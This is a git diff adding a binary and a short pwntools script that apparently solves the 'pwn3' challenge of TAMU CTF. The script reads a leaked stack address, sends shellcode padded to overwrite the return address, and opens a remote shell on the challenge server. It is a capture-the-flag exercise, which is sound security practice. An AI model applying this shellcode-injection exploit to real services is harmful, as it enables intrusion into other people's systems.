diff --git a/tamu-writeup/pwn3 b/tamu-writeup/pwn3
new file mode 100644
index 0000000..e66f5b7
Binary files /dev/null and b/tamu-writeup/pwn3 differ
diff --git a/tamu-writeup/pwn3wp.py b/tamu-writeup/pwn3wp.py
new file mode 100644
index 0000000..bf9db51
--- /dev/null
+++ b/tamu-writeup/pwn3wp.py
@@ -0,0 +1,6 @@
+from pwn import *
+sh = remote("pwn.tamuctf.com", 4323)
+p = p32(int(sh.recvline()[-12:-2], 16))
+pld = asm(shellcraft.sh()).ljust(0x12a + 4, 'a') + p
+sh.sendline(pld)
+sh.interactive()
\ No newline at end of file